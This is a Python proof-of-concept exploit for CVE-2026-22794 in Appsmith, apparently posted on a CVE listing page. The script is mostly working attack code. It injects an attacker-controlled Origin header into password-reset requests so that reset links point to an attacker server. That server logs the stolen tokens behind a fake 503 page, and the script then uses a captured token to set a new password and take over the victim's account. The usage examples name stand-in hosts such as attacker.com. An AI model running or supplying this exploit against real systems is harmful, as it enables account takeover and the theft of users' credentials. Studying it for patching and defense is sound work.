4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-22794 - Appsmith Origin Header Injection PoC
======================================================

Vulnerability: Password Reset Link Hijacking via Origin Header Manipulation
Affected Software: Appsmith (versions prior to patch)
Severity: Critical (CVSS 9.1)
Impact: Full Account Takeover

Description:
    Appsmith uses the HTTP Origin header without validation to construct
    password reset and email verification URLs. An attacker can inject a
    malicious Origin header to redirect password reset tokens to an
    attacker-controlled server, resulting in full account takeover.

Author: Security Researcher
Disclaimer: This tool is for authorized security testing only.
            Unauthorized access to computer systems is illegal.
"""

import argparse
import requests
import threading
import socket
import sys
import time
import urllib.parse
from http.server import HTTPServer, BaseHTTPRequestHandler
from datetime import datetime
from colorama import Fore, Style, init

# Initialize colorama for cross-platform colored output.
# NOTE(review): autoreset=True presumably makes colorama reset colors after
# every print so a missing Style.RESET_ALL cannot bleed into later output;
# confirm against the colorama documentation.
init(autoreset=True)

# Fix Windows console encoding: emit UTF-8 and substitute (instead of raising
# on) characters the console cannot encode.
import io

for _stream_name in ("stdout", "stderr"):
    _stream = getattr(sys, _stream_name)
    _reconfigure = getattr(_stream, "reconfigure", None)
    if callable(_reconfigure):
        # Python 3.7+: adjust the existing stream in place. This keeps any
        # wrapper already installed around the stream (e.g. by colorama)
        # instead of replacing it with a bare TextIOWrapper.
        try:
            _reconfigure(encoding="utf-8", errors="replace")
        except (ValueError, io.UnsupportedOperation):
            # Best effort only: a stream that refuses reconfiguration is left
            # as it is rather than aborting start-up.
            pass
    elif hasattr(_stream, "buffer"):
        # Older interpreters: fall back to re-wrapping the underlying binary
        # buffer. Streams that are None or have no buffer are left untouched.
        setattr(
            sys,
            _stream_name,
            io.TextIOWrapper(_stream.buffer, encoding="utf-8", errors="replace"),
        )
del _stream_name, _stream, _reconfigure

# Banner (ASCII-safe for Windows compatibility)
# Built once at import time: the Fore/Style values are interpolated into the
# string here, and main() prints it before parsing arguments.
BANNER = f"""
{Fore.RED}+===================================================================+
|                   CVE-2026-22794 EXPLOIT                          |
|           Appsmith Origin Header Injection PoC                    |
|                  Password Reset Token Hijack                      |
+===================================================================+{Style.RESET_ALL}

{Fore.YELLOW}[!] DISCLAIMER: For authorized security testing only!{Style.RESET_ALL}
{Fore.YELLOW}[!] Unauthorized access to computer systems is illegal.{Style.RESET_ALL}
"""

# Global storage for captured tokens.
# TokenCaptureHandler.do_GET appends one dict per captured token (keys:
# 'token', 'timestamp', 'path', 'client_ip'); main() reads the list from its
# wait loop while the server runs in a background thread.
captured_tokens = []


class TokenCaptureHandler(BaseHTTPRequestHandler):
    """HTTP handler that records ``token`` query parameters from incoming requests.

    GET requests are logged to the console; when the query string contains a
    ``token`` parameter its first value is appended to the module-level
    ``captured_tokens`` list and to ``captured_tokens.txt``. POST requests have
    their body echoed to the console and are answered with a small JSON
    acknowledgement.
    """

    def log_message(self, format, *args):
        """Print a timestamped line for each logged event.

        Overrides the base-class logger (which writes to stderr). Only the
        first format argument is shown; for ordinary request logging that is
        the request line. Falls back to the raw format string when no
        arguments were supplied, instead of raising IndexError.
        """
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        detail = args[0] if args else format
        print(f"{Fore.GREEN}[{timestamp}] {Fore.CYAN}Request: {detail}{Style.RESET_ALL}")

    def do_GET(self):
        """Log the request, record any ``token`` query parameter, and reply.

        The reply is always HTTP 200 with a static HTML page whose text reads
        "503 Service Temporarily Unavailable".
        """
        parsed_path = urllib.parse.urlparse(self.path)
        query_params = urllib.parse.parse_qs(parsed_path.query)
        client_ip, client_port = self.client_address[0], self.client_address[1]

        print(f"\n{Fore.GREEN}{'='*60}")
        print(f"{Fore.RED}[+] INCOMING REQUEST CAPTURED!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Path: {Fore.WHITE}{self.path}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Client: {Fore.WHITE}{client_ip}:{client_port}{Style.RESET_ALL}")

        # Check for reset token
        if 'token' in query_params:
            # parse_qs maps each key to a list of values; only the first is kept.
            token = query_params['token'][0]
            # Appending mutates the module-level list in place, so no
            # ``global`` declaration is needed.
            captured_tokens.append({
                'token': token,
                'timestamp': datetime.now().isoformat(),
                'path': self.path,
                'client_ip': client_ip
            })
            print(f"\n{Fore.RED}[!!!] PASSWORD RESET TOKEN CAPTURED!{Style.RESET_ALL}")
            print(f"{Fore.RED}[!!!] Token: {Fore.WHITE}{token}{Style.RESET_ALL}")
            print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")

            # Save token to file (explicit encoding so the log does not depend
            # on the platform's default code page).
            with open('captured_tokens.txt', 'a', encoding='utf-8') as f:
                f.write(f"{datetime.now().isoformat()} | {token} | {client_ip}\n")

        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

        # Static page returned for every GET, regardless of path or token.
        response = """
        <!DOCTYPE html>
        <html>
        <head>
            <title>Service Temporarily Unavailable</title>
            <style>
                body { font-family: Arial, sans-serif; text-align: center; padding: 50px; }
                h1 { color: #333; }
                p { color: #666; }
            </style>
        </head>
        <body>
            <h1>503 Service Temporarily Unavailable</h1>
            <p>The server is temporarily unable to service your request. Please try again later.</p>
        </body>
        </html>
        """
        self.wfile.write(response.encode())

    def do_POST(self):
        """Echo the request body to the console and acknowledge with JSON."""
        # A missing or malformed Content-Length is treated as "no body".
        try:
            content_length = int(self.headers.get('Content-Length', 0))
        except (TypeError, ValueError):
            content_length = 0

        # The body is read from the request's input stream (rfile);
        # ``requestline`` is just the text of the first request line.
        # Non-positive lengths are skipped so read() is never asked to block
        # until EOF.
        post_data = self.rfile.read(content_length) if content_length > 0 else b''

        # errors='replace' keeps non-UTF-8 bodies from raising in the handler.
        body_text = post_data.decode('utf-8', errors='replace')
        print(f"\n{Fore.YELLOW}[*] POST Data Received: {body_text}{Style.RESET_ALL}")

        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(b'{"status": "ok"}')


def start_capture_server(port: int, host: str = "0.0.0.0"):
    """Bind an HTTPServer using TokenCaptureHandler and serve requests forever.

    Args:
        port: TCP port to listen on.
        host: Interface address to bind (defaults to all interfaces).

    This call blocks in ``serve_forever()``; main() runs it in a daemon thread.
    """
    bind_address = (host, port)
    httpd = HTTPServer(bind_address, TokenCaptureHandler)

    startup_lines = (
        f"{Fore.GREEN}[+] Token capture server started on {host}:{port}{Style.RESET_ALL}",
        f"{Fore.YELLOW}[*] Waiting for victim to click the malicious reset link...{Style.RESET_ALL}\n",
    )
    for line in startup_lines:
        print(line)

    httpd.serve_forever()


def send_malicious_reset_request(
    target_url: str,
    victim_email: str,
    attacker_origin: str,
    timeout: int = 30
) -> dict:
    """
    POST a forgot-password request whose Origin header is ``attacker_origin``.

    Args:
        target_url: Base URL of the Appsmith instance (trailing '/' is stripped
            when building the API endpoint).
        victim_email: Email address placed in the JSON payload.
        attacker_origin: Value sent as the Origin header.
        timeout: Request timeout in seconds.

    Returns:
        dict: On a completed request, the keys 'success' (True for HTTP
        200/201/202), 'status_code', 'response' and 'headers'. On any
        exception, ``{'success': False, 'error': <description>}``.
    """
    endpoint = target_url.rstrip('/') + "/api/v1/users/forgotPassword"

    request_headers = {
        'Content-Type': 'application/json',
        'Origin': attacker_origin,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'en-US,en;q=0.9',
        # Built from target_url exactly as given (trailing slash not stripped).
        'Referer': f"{target_url}/user/forgotPassword",
    }
    body = {'email': victim_email}

    print(f"\n{Fore.CYAN}[*] Sending malicious password reset request...{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Target: {Fore.WHITE}{endpoint}{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Victim Email: {Fore.WHITE}{victim_email}{Style.RESET_ALL}")
    print(f"{Fore.RED}[*] Malicious Origin: {Fore.WHITE}{attacker_origin}{Style.RESET_ALL}")

    try:
        # verify=True keeps TLS certificate validation on; set to False only
        # for self-signed certs in testing.
        reply = requests.post(
            endpoint,
            json=body,
            headers=request_headers,
            timeout=timeout,
            verify=True
        )

        accepted = reply.status_code in [200, 201, 202]
        outcome = {
            'success': accepted,
            'status_code': reply.status_code,
            'response': reply.text,
            'headers': dict(reply.headers)
        }

        if not accepted:
            print(f"\n{Fore.RED}[-] Request failed with status code: {reply.status_code}{Style.RESET_ALL}")
            print(f"{Fore.YELLOW}[*] Response: {reply.text[:500]}{Style.RESET_ALL}")
            return outcome

        print(f"\n{Fore.GREEN}[+] SUCCESS! Password reset email triggered!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}[+] Status Code: {reply.status_code}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] The victim will receive an email with a link pointing to:{Style.RESET_ALL}")
        print(f"{Fore.RED}    {attacker_origin}/user/resetPassword?token=XXXXX{Style.RESET_ALL}")
        print(f"\n{Fore.CYAN}[*] Waiting for victim to click the link...{Style.RESET_ALL}")
        return outcome

    # Timeout is handled before ConnectionError so a connect timeout is
    # reported as a timeout.
    except requests.exceptions.Timeout:
        print(f"{Fore.RED}[-] Request timed out{Style.RESET_ALL}")
        return {'success': False, 'error': 'timeout'}
    except requests.exceptions.ConnectionError as conn_err:
        print(f"{Fore.RED}[-] Connection error: {conn_err}{Style.RESET_ALL}")
        return {'success': False, 'error': str(conn_err)}
    except Exception as err:
        print(f"{Fore.RED}[-] Unexpected error: {err}{Style.RESET_ALL}")
        return {'success': False, 'error': str(err)}


def reset_password_with_token(
    target_url: str,
    token: str,
    new_password: str,
    timeout: int = 30
) -> dict:
    """
    POST ``token`` and ``new_password`` to the target's resetPassword endpoint.

    Args:
        target_url: Base URL of the Appsmith instance.
        token: Password reset token to submit.
        new_password: Password to set.
        timeout: Request timeout in seconds.

    Returns:
        dict: ``{'success': True, 'status_code': ...}`` for HTTP 200/201;
        ``{'success': False, 'status_code': ..., 'response': ...}`` for any
        other status; ``{'success': False, 'error': ...}`` if the request
        raised.

    Note:
        The new password is echoed to the console in clear text on success.
    """
    endpoint = target_url.rstrip('/') + "/api/v1/users/resetPassword"

    request_headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
    }
    body = {'token': token, 'password': new_password}

    print(f"\n{Fore.RED}[!] EXECUTING ACCOUNT TAKEOVER...{Style.RESET_ALL}")
    # Only the first 20 characters of the token are shown.
    print(f"{Fore.YELLOW}[*] Using captured token: {token[:20]}...{Style.RESET_ALL}")

    try:
        reply = requests.post(
            endpoint,
            json=body,
            headers=request_headers,
            timeout=timeout,
            verify=True
        )

        status = reply.status_code
        if status not in [200, 201]:
            print(f"{Fore.RED}[-] Password reset failed: {status}{Style.RESET_ALL}")
            return {'success': False, 'status_code': status, 'response': reply.text}

        print(f"\n{Fore.GREEN}{'='*60}")
        print(f"{Fore.GREEN}[+] ACCOUNT TAKEOVER SUCCESSFUL!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}[+] Password has been reset to: {new_password}{Style.RESET_ALL}")
        print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
        return {'success': True, 'status_code': status}

    except Exception as err:
        print(f"{Fore.RED}[-] Error: {err}{Style.RESET_ALL}")
        return {'success': False, 'error': str(err)}


def check_vulnerability(target_url: str) -> bool:
    """
    Heuristically probe the forgotPassword endpoint with a foreign Origin.

    Two probes are sent: an OPTIONS request, then a POST. The result is True
    when the OPTIONS reply (status 200/204) allows the foreign origin via
    Access-Control-Allow-Origin, or when the POST reply is anything other than
    HTTP 403.

    NOTE(review): the second rule treats every non-403 status (including 404
    or 5xx) as "may be vulnerable", so a True result is only a hint and needs
    manual verification. The POST is also a real forgot-password request.

    Args:
        target_url: Base URL of the Appsmith instance.

    Returns:
        bool: True if potentially vulnerable; False if the POST returned 403
        or any exception occurred.
    """
    print(f"\n{Fore.CYAN}[*] Checking if target is vulnerable...{Style.RESET_ALL}")

    try:
        endpoint = target_url.rstrip('/') + "/api/v1/users/forgotPassword"

        # Probe 1: CORS preflight with an unrelated origin.
        preflight = requests.options(
            endpoint,
            headers={'Origin': 'https://evil-attacker.com'},
            timeout=10
        )
        if preflight.status_code in [200, 204]:
            allowed_origin = preflight.headers.get('Access-Control-Allow-Origin', '')
            if allowed_origin == '*' or 'evil-attacker.com' in allowed_origin:
                print(f"{Fore.RED}[+] Target appears VULNERABLE! CORS is misconfigured.{Style.RESET_ALL}")
                return True

        # Probe 2: actual POST with the same foreign origin.
        # NOTE(review): the email literal looks like email-obfuscation residue
        # from wherever this file was copied; it is sent unchanged.
        probe = requests.post(
            endpoint,
            json={'email': '[email protected]'},
            headers={'Origin': 'https://evil-attacker.com', 'Content-Type': 'application/json'},
            timeout=10
        )

        origin_rejected = probe.status_code == 403
        if origin_rejected:
            print(f"{Fore.GREEN}[-] Target appears to validate Origin header.{Style.RESET_ALL}")
            return False

        print(f"{Fore.YELLOW}[?] Target may be vulnerable. Manual verification recommended.{Style.RESET_ALL}")
        return True

    except Exception as err:
        print(f"{Fore.YELLOW}[?] Could not determine vulnerability status: {err}{Style.RESET_ALL}")
        return False


def get_public_ip() -> str:
    """Return this machine's public IP as reported by api.ipify.org.

    Returns:
        str: The response body with surrounding whitespace removed, or the
        placeholder ``"YOUR_PUBLIC_IP"`` when the lookup fails (network error,
        timeout, HTTP error status, or empty body).
    """
    try:
        response = requests.get('https://api.ipify.org', timeout=5)
        # Treat 4xx/5xx as failure so an error page is never shown as an IP.
        response.raise_for_status()
    except requests.exceptions.RequestException:
        # Only request failures are swallowed; KeyboardInterrupt and
        # SystemExit propagate normally.
        return "YOUR_PUBLIC_IP"

    return response.text.strip() or "YOUR_PUBLIC_IP"


def _build_arg_parser() -> argparse.ArgumentParser:
    """Create the command-line parser with all options and usage examples."""
    parser = argparse.ArgumentParser(
        description='CVE-2026-22794 - Appsmith Origin Header Injection Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Start token capture server only
  python exploit.py --listen --port 8080
  
  # Send malicious reset request
  python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com
  
  # Full automated attack
  python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com --listen --port 8080
  
  # Use captured token to reset password
  python exploit.py --target https://appsmith.target.com --reset-token CAPTURED_TOKEN --new-password NewP@ssw0rd!
  
  # Check if target is vulnerable
  python exploit.py --target https://appsmith.target.com --check
        """
    )

    parser.add_argument(
        '-t', '--target',
        help='Target Appsmith URL (e.g., https://appsmith.target.com)'
    )
    parser.add_argument(
        '-e', '--email',
        help='Victim email address'
    )
    parser.add_argument(
        '-a', '--attacker-url',
        help='Attacker server URL to receive the token (e.g., https://attacker.com)'
    )
    parser.add_argument(
        '-l', '--listen',
        action='store_true',
        help='Start HTTP server to capture tokens'
    )
    parser.add_argument(
        '-p', '--port',
        type=int,
        default=8080,
        help='Port for token capture server (default: 8080)'
    )
    parser.add_argument(
        '--host',
        default='0.0.0.0',
        help='Host to bind capture server (default: 0.0.0.0)'
    )
    parser.add_argument(
        '-r', '--reset-token',
        help='Use a captured token to reset password'
    )
    parser.add_argument(
        '-n', '--new-password',
        help='New password to set (used with --reset-token)'
    )
    parser.add_argument(
        '-c', '--check',
        action='store_true',
        help='Check if target is vulnerable'
    )
    parser.add_argument(
        '--timeout',
        type=int,
        default=30,
        help='Request timeout in seconds (default: 30)'
    )
    return parser


def main():
    """Parse the command line and run the selected mode.

    Modes are evaluated in this order, and the first two exit the process when
    done:

    1. ``--check``: probe the target (requires ``--target``).
    2. ``--reset-token``: submit a token and new password (requires
       ``--target`` and ``--new-password``).
    3. ``--listen``: start the capture server in a daemon thread.
    4. ``--target`` + ``--email`` + ``--attacker-url``: send the reset
       request; if also listening and the request succeeded, wait until
       Ctrl+C while reporting captured tokens.

    With ``--listen`` alone the server runs until Ctrl+C. Any other
    combination prints the help text.
    """
    print(BANNER)

    parser = _build_arg_parser()
    args = parser.parse_args()

    # If no arguments, show help
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(0)

    # Check vulnerability
    if args.check:
        if not args.target:
            print(f"{Fore.RED}[-] Please specify target URL with --target{Style.RESET_ALL}")
            sys.exit(1)
        check_vulnerability(args.target)
        sys.exit(0)

    # Reset password with token
    if args.reset_token:
        if not args.target or not args.new_password:
            print(f"{Fore.RED}[-] Please specify --target and --new-password{Style.RESET_ALL}")
            sys.exit(1)
        reset_password_with_token(args.target, args.reset_token, args.new_password, args.timeout)
        sys.exit(0)

    # Start the capture server in background if requested
    if args.listen:
        public_ip = get_public_ip()
        print(f"{Fore.CYAN}[*] Your public IP: {public_ip}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Make sure port {args.port} is accessible from the internet{Style.RESET_ALL}")

        # Daemon thread: the server dies with the main thread, so the wait
        # loops below are what keep the process alive.
        server_thread = threading.Thread(
            target=start_capture_server,
            args=(args.port, args.host),
            daemon=True
        )
        server_thread.start()
        time.sleep(1)  # Give server time to start

    # Send malicious reset request
    if args.target and args.email and args.attacker_url:
        result = send_malicious_reset_request(
            args.target,
            args.email,
            args.attacker_url,
            args.timeout
        )

        # If listening, keep the server running
        if args.listen and result.get('success'):
            print(f"\n{Fore.CYAN}[*] Server is running. Press Ctrl+C to stop.{Style.RESET_ALL}")
            # Number of tokens already reported; the summary is printed only
            # when this changes, instead of once per second forever.
            reported = 0
            try:
                while True:
                    time.sleep(1)
                    # Snapshot: the handler thread may append concurrently.
                    snapshot = list(captured_tokens)
                    if len(snapshot) > reported:
                        reported = len(snapshot)
                        print(f"\n{Fore.GREEN}[+] Tokens captured so far: {reported}{Style.RESET_ALL}")
                        for entry in snapshot:
                            print(f"    - {entry['token'][:30]}... ({entry['timestamp']})")
            except KeyboardInterrupt:
                print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
                if captured_tokens:
                    print(f"\n{Fore.GREEN}[+] Total tokens captured: {len(captured_tokens)}{Style.RESET_ALL}")
                    print(f"{Fore.YELLOW}[*] Tokens saved to captured_tokens.txt{Style.RESET_ALL}")

    elif args.listen:
        # Just run the server
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")

    else:
        parser.print_help()

# Run the command-line interface only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == '__main__':
    main()